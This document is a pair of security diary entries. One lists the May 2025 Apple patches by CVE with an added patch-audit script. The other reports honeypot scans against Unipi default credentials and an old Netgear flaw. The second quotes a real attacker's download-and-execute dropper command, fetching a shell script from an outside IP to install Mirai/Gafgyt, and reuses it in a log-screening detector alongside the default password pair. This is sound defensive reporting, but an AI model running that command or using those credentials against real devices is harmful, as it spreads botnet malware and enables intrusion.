Apple Updates Everything: May 2025 Edition

    Published: 2025-05-12. Last Updated: 2025-05-12 20:30:06 UTC
    by Johannes Ullrich (Version: 1)

    Apple released its expected update for all its operating systems. The update, in addition to providing new features, patches 65 different vulnerabilities. Many of these vulnerabilities affect multiple operating systems within the Apple ecosystem.

    Of note is CVE-2025-31200. This vulnerability is already exploited in "targeted attacks". Apple released patches for this vulnerability in mid-April for its current operating systems (iOS 18, macOS 15, tvOS 18, and visionOS 2). This update includes patches for older versions of macOS and iPadOS/iOS.


    The releases in this update are iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6, watchOS 11.5, tvOS 18.5, and visionOS 2.5. For each CVE, the "Fixed in" line lists which of these releases include the fix.

    CVE-2025-24097: An app may be able to read arbitrary file metadata.
    Affects AirDrop
    Fixed in: iPadOS 17.7.7

    CVE-2025-24111: An app may be able to cause unexpected system termination.
    Affects Display
    Fixed in: iPadOS 17.7.7

    CVE-2025-24142: An app may be able to access sensitive user data.
    Affects Notification Center
    Fixed in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-24144: An app may be able to leak sensitive kernel state.
    Affects Kernel
    Fixed in: iPadOS 17.7.7, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-24155: An app may be able to disclose kernel memory.
    Affects WebContentFilter
    Fixed in: macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-24213: A type confusion issue could lead to memory corruption.
    Affects WebKit
    Fixed in: iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

    CVE-2025-24220: An app may be able to read a persistent device identifier.
    Affects Sandbox Profiles
    Fixed in: iPadOS 17.7.7

    CVE-2025-24222: Processing maliciously crafted web content may lead to an unexpected process crash.
    Affects BOM
    Fixed in: macOS Sequoia 15.5

    CVE-2025-24223: Processing maliciously crafted web content may lead to memory corruption.
    Affects WebKit
    Fixed in: macOS Sequoia 15.5

    CVE-2025-24225: Processing an email may lead to user interface spoofing.
    Affects Mail Addressing
    Fixed in: iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7

    CVE-2025-24258: An app may be able to gain root privileges.
    Affects DiskArbitration
    Fixed in: macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-24259: An app may be able to retrieve Safari bookmarks without an entitlement check.
    Affects Parental Controls
    Fixed in: iPadOS 17.7.7

    CVE-2025-24274: A malicious app may be able to gain root privileges.
    Affects Mobile Device Service
    Fixed in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-30440: An app may be able to bypass ASLR.
    Affects Libinfo
    Fixed in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-30442: An app may be able to gain elevated privileges.
    Affects SoftwareUpdate
    Fixed in: macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-30443: An app may be able to access user-sensitive data.
    Affects Found in Apps
    Fixed in: macOS Sequoia 15.5

    CVE-2025-30448: An attacker may be able to turn on sharing of an iCloud folder without authentication.
    Affects iCloud Document Sharing
    Fixed in: iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7, macOS Sonoma 14.7.6, macOS Ventura 13.7.6, visionOS 2.5

    CVE-2025-30453: A malicious app may be able to gain root privileges.
    Affects DiskArbitration
    Fixed in: macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-31196: Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents.
    Affects CoreGraphics
    Fixed in: iPadOS 17.7.7, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-31200: Processing an audio stream in a maliciously crafted media file may result in code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS released before iOS 18.4.1.
    Affects CoreAudio
    Fixed in: watchOS 11.5

    CVE-2025-31204: Processing maliciously crafted web content may lead to memory corruption.
    Affects WebKit
    Fixed in: iOS 18.5 and iPadOS 18.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

    CVE-2025-31205: A malicious website may exfiltrate data cross-origin.
    Affects WebKit
    Fixed in: iOS 18.5 and iPadOS 18.5, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

    CVE-2025-31206: Processing maliciously crafted web content may lead to an unexpected Safari crash.
    Affects WebKit
    Fixed in: iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

    CVE-2025-31207: An app may be able to enumerate a user's installed apps.
    Affects FrontBoard
    Fixed in: iOS 18.5 and iPadOS 18.5

    CVE-2025-31208: Parsing a file may lead to an unexpected app termination.
    Affects CoreAudio
    Fixed in: all eight releases

    CVE-2025-31209: Parsing a file may lead to disclosure of user information.
    Affects CoreGraphics
    Fixed in: all eight releases

    CVE-2025-31210: Processing web content may lead to a denial-of-service.
    Affects FaceTime
    Fixed in: iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7

    CVE-2025-31212: An app may be able to access sensitive user data.
    Affects Core Bluetooth
    Fixed in: iOS 18.5 and iPadOS 18.5, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

    CVE-2025-31213: An app may be able to access associated usernames and websites in a user's iCloud Keychain.
    Affects Security
    Fixed in: iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-31214: An attacker in a privileged network position may be able to intercept network traffic.
    Affects Baseband
    Fixed in: iOS 18.5 and iPadOS 18.5

    CVE-2025-31215: Processing maliciously crafted web content may lead to an unexpected process crash.
    Affects WebKit
    Fixed in: iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

    CVE-2025-31217: Processing maliciously crafted web content may lead to an unexpected Safari crash.
    Affects WebKit
    Fixed in: iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

    CVE-2025-31218: An app may be able to observe the hostnames of new network connections.
    Affects NetworkExtension
    Fixed in: macOS Sequoia 15.5

    CVE-2025-31219: An attacker may be able to cause unexpected system termination or corrupt kernel memory.
    Affects Kernel
    Fixed in: all eight releases

    CVE-2025-31220: A malicious app may be able to read sensitive location information.
    Affects Weather
    Fixed in: iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-31221: A remote attacker may be able to leak memory.
    Affects Security
    Fixed in: all eight releases

    CVE-2025-31222: A user may be able to elevate privileges.
    Affects mDNSResponder
    Fixed in: iOS 18.5 and iPadOS 18.5, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6, watchOS 11.5, tvOS 18.5, visionOS 2.5

    CVE-2025-31224: An app may be able to bypass certain Privacy preferences.
    Affects Sandbox
    Fixed in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-31225: Call history from deleted apps may still appear in spotlight search results.
    Affects Call History
    Fixed in: iOS 18.5 and iPadOS 18.5

    CVE-2025-31226: Processing a maliciously crafted image may lead to a denial-of-service.
    Affects ImageIO
    Fixed in: iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

    CVE-2025-31227: An attacker with physical access to a device may be able to access a deleted call recording.
    Affects Notes
    Fixed in: iOS 18.5 and iPadOS 18.5

    CVE-2025-31228: An attacker with physical access to a device may be able to access notes from the lock screen.
    Affects Notes
    Fixed in: iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7

    CVE-2025-31232: A sandboxed app may be able to access sensitive user data.
    Affects Installer
    Fixed in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-31233: Processing a maliciously crafted video file may lead to unexpected app termination or corrupt process memory.
    Affects CoreMedia
    Fixed in: all eight releases

    CVE-2025-31234: An attacker may be able to cause unexpected system termination or corrupt kernel memory.
    Affects Pro Res
    Fixed in: iOS 18.5 and iPadOS 18.5, macOS Sequoia 15.5, tvOS 18.5, visionOS 2.5

    CVE-2025-31235: An app may be able to cause unexpected system termination.
    Affects Audio
    Fixed in: iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-31236: An app may be able to access sensitive user data.
    Affects Finder
    Fixed in: macOS Sequoia 15.5

    CVE-2025-31237: Mounting a maliciously crafted AFP network share may lead to system termination.
    Affects afpfs
    Fixed in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-31238: Processing maliciously crafted web content may lead to memory corruption.
    Affects WebKit
    Fixed in: iOS 18.5 and iPadOS 18.5, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

    CVE-2025-31239: Parsing a file may lead to an unexpected app termination.
    Affects CoreMedia
    Fixed in: all eight releases

    CVE-2025-31241: A remote attacker may cause an unexpected app termination.
    Affects Kernel
    Fixed in: all eight releases

    CVE-2025-31242: An app may be able to access sensitive user data.
    Affects StoreKit
    Fixed in: iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-31244: An app may be able to break out of its sandbox.
    Affects quarantine
    Fixed in: macOS Sequoia 15.5

    CVE-2025-31245: An app may be able to cause unexpected system termination.
    Affects Pro Res
    Fixed in: iOS 18.5 and iPadOS 18.5, iPadOS 17.7.7, macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6, tvOS 18.5, visionOS 2.5

    CVE-2025-31246: Connecting to a malicious AFP server may corrupt kernel memory.
    Affects afpfs
    Fixed in: macOS Sequoia 15.5, macOS Sonoma 14.7.6

    CVE-2025-31247: An attacker may gain access to protected parts of the file system.
    Affects SharedFileList
    Fixed in: macOS Sequoia 15.5, macOS Sonoma 14.7.6, macOS Ventura 13.7.6

    CVE-2025-31249: An app may be able to access sensitive user data.
    Affects Sandbox
    Fixed in: macOS Sequoia 15.5

    CVE-2025-31250: An app may be able to access sensitive user data.
    Affects TCC
    Fixed in: macOS Sequoia 15.5

    CVE-2025-31251: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory.
    Affects AppleJPEG
    Fixed in: all eight releases

    CVE-2025-31253: Muting the microphone during a FaceTime call may not result in audio being silenced.
    Affects FaceTime
    Fixed in: iOS 18.5 and iPadOS 18.5

    CVE-2025-31256: Hot corner may unexpectedly reveal a user's deleted notes.
    Affects Notes
    Fixed in: macOS Sequoia 15.5

    CVE-2025-31257: Processing maliciously crafted web content may lead to an unexpected Safari crash.
    Affects WebKit
    Fixed in: iOS 18.5 and iPadOS 18.5, macOS Sequoia 15.5, watchOS 11.5, tvOS 18.5, visionOS 2.5

    CVE-2025-31258: An app may be able to break out of its sandbox.
    Affects RemoteViewServices
    Fixed in: macOS Sequoia 15.5

    CVE-2025-31259: An app may be able to gain elevated privileges.
    Affects SoftwareUpdate
    Fixed in: macOS Sequoia 15.5

    CVE-2025-31260: An app may be able to access sensitive user data.
    Affects Apple Intelligence Reports
    Fixed in: macOS Sequoia 15.5
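    Because each OS has several supported lines in this update (macOS 15, 14 and 13; iPadOS 18 and 17), a device is current when it is at or above the fix release for its own line, not the newest release overall. The following is an added example (not code from the diary) that applies that rule to an inventory; the release numbers are those listed above, and the device inventory is constructed.

```python
"""Flag devices that have not yet received the May 2025 Apple releases.

Added example, not code from the SANS ISC diary. The fix releases per OS line
come from the diary's table; the device inventory below is constructed.
"""

# Fix release per OS line, keyed by major version, as listed in the diary.
PATCHED = {
    "iOS":      {18: "18.5"},
    "iPadOS":   {18: "18.5", 17: "17.7.7"},
    "macOS":    {15: "15.5", 14: "14.7.6", 13: "13.7.6"},
    "watchOS":  {11: "11.5"},
    "tvOS":     {18: "18.5"},
    "visionOS": {2: "2.5"},
}


def parse_version(v: str) -> tuple:
    """'14.7.6' -> (14, 7, 6); short versions are zero-padded so 18.5 == 18.5.0."""
    parts = tuple(int(p) for p in v.strip().split("."))
    return parts + (0,) * (3 - len(parts))


def patch_status(os_name: str, version: str) -> str:
    """Compare an installed version against the fix release for its own OS line."""
    lines = PATCHED.get(os_name)
    if lines is None:
        return "unknown OS"
    installed = parse_version(version)
    fixed = lines.get(installed[0])
    if fixed is None:
        # e.g. macOS 12: no release in this update, so it cannot be brought current
        return "unsupported line"
    if installed >= parse_version(fixed):
        return "patched"
    return f"needs update to {fixed}"


def audit(inventory):
    """inventory: iterable of (hostname, os_name, version). Returns non-patched hosts."""
    findings = []
    for host, os_name, version in inventory:
        status = patch_status(os_name, version)
        if status != "patched":
            findings.append((host, status))
    return findings


# Constructed sample inventory (hostnames and versions are made up for the example).
SAMPLE_INVENTORY = [
    ("mac-01", "macOS", "15.5"),
    ("mac-02", "macOS", "14.7.5"),
    ("mac-03", "macOS", "12.7.6"),
    ("ipad-01", "iPadOS", "17.7.6"),
    ("phone-01", "iOS", "18.5"),
    ("watch-01", "watchOS", "11.4"),
]

if __name__ == "__main__":
    for host, status in audit(SAMPLE_INVENTORY):
        print(f"{host}: {status}")
```

    The check answers only whether the release containing the fixes is installed; as the per-CVE lists show, not every CVE is fixed on every line, so a device on an older line that is "patched" here may still lack fixes that only shipped for the current line.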

    ---
    Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

    Keywords: apple ios macos patches

    It Is 2025, And We Are Still Dealing With Default IoT Passwords And Stupid 2013 Router Vulnerabilities

    Published: 2025-05-12. Last Updated: 2025-05-12 13:49:21 UTC
    by Johannes Ullrich (Version: 1)

    Unipi Technologies is a company developing programmable logic controllers for a number of different applications, such as home automation, building management, and industrial controls. The modules produced by Unipi are likely to appeal to a more professional audience. All modules are based on the "Mervis" platform, a customized Linux distribution maintained by Unipi.

    In the last couple of days, we observed scans for the Unipi default username and password ("unipi" and "unipi.technology") in our honeypot logs. The scans originate from 176.65.148.10, an IP address that is well known to our database.

    In addition to SSH, the IP address also scans for an ancient Netgear vulnerability from 2013, which was only assigned a CVE number last year (CVE-2024-12847).

    Both the SSH and the "Netgear" exploit attempts execute the same command:

    cd /tmp; rm -rf wget.sh curl.sh; wget http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh;curl -o http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh

    which kicks off the standard Mirai/Gafgyt install chain.
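    The two observations above (login attempts with the vendor default credentials, followed by a fetch-chmod-execute command) are the kind of thing a honeypot or SSH log can be screened for. The following is an added example, not code from the diary: it runs a default-credential check and a download-and-execute pattern over constructed log lines whose format is made up for the example, while the source IP, credential pair and command text are the ones quoted in the diary.

```python
"""Screen honeypot log lines for default-credential logins and dropper commands.

Added example, not code from the SANS ISC diary. The log line format and the
sample lines are constructed; the credential pair and the command shape are
taken from the diary. Adapt LINE_RE and LOGIN_RE to your own log format.
"""
import re
from typing import Dict, List, Set

# Vendor default credentials observed in the diary's scans: (username, password).
DEFAULT_CREDS = {("unipi", "unipi.technology")}

# Constructed log format: "<timestamp> <src_ip> <channel> <event text>".
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) (?P<chan>\S+) (?P<event>.*)$"
)
# Login attempts are logged as "login attempt [user/password] <result>".
LOGIN_RE = re.compile(r"login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\]")
# Dropper shape from the diary: fetch with wget or curl, chmod +x, run with sh.
DROPPER_RE = re.compile(r"\b(wget|curl)\b.*\bchmod \+x\b.*\bsh \S+", re.S)
URL_RE = re.compile(r"https?://[^\s;'\"]+")


def analyze(lines: List[str]) -> Dict[str, object]:
    """Return alerts plus the IPs and download URLs extracted as indicators."""
    alerts = []
    urls: Set[str] = set()
    ips: Set[str] = set()
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # not in the expected format; skip rather than guess
        ip, event = m["ip"], m["event"]

        lm = LOGIN_RE.search(event)
        if lm and (lm["user"], lm["pw"]) in DEFAULT_CREDS:
            alerts.append({"ip": ip, "type": "default-credential login", "user": lm["user"]})
            ips.add(ip)

        if DROPPER_RE.search(event):
            found = URL_RE.findall(event)
            alerts.append({"ip": ip, "type": "download-and-execute", "urls": sorted(set(found))})
            urls.update(found)
            ips.add(ip)
    return {"alerts": alerts, "urls": urls, "ips": ips}


# Constructed sample lines. The first two reuse the IP, credentials and command
# quoted in the diary; the others are benign-looking filler with a documentation IP.
SAMPLE_LOG = [
    "2025-05-11T03:12:44Z 176.65.148.10 ssh login attempt [unipi/unipi.technology] failed",
    "2025-05-11T03:12:45Z 176.65.148.10 ssh command: cd /tmp; rm -rf wget.sh curl.sh; "
    "wget http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh;"
    "curl -o http://213.209.143.44/ssh.sh; chmod +x ssh.sh; sh ssh.sh",
    "2025-05-11T03:13:02Z 203.0.113.7 ssh login attempt [root/toor] failed",
    "2025-05-11T03:15:10Z 203.0.113.7 ssh command: uname -a",
]

if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for alert in result["alerts"]:
        print(alert)
    print("download URLs:", sorted(result["urls"]))
    print("source IPs:", sorted(result["ips"]))
```

    The dropper rule keys on the command shape rather than on the specific host, so it keeps firing when the payload server changes; the URLs it extracts are what you would feed to blocklists or egress monitoring. The default-credential set is deliberately small here and should hold every vendor default for the device classes you expose.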


    ---
    Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu
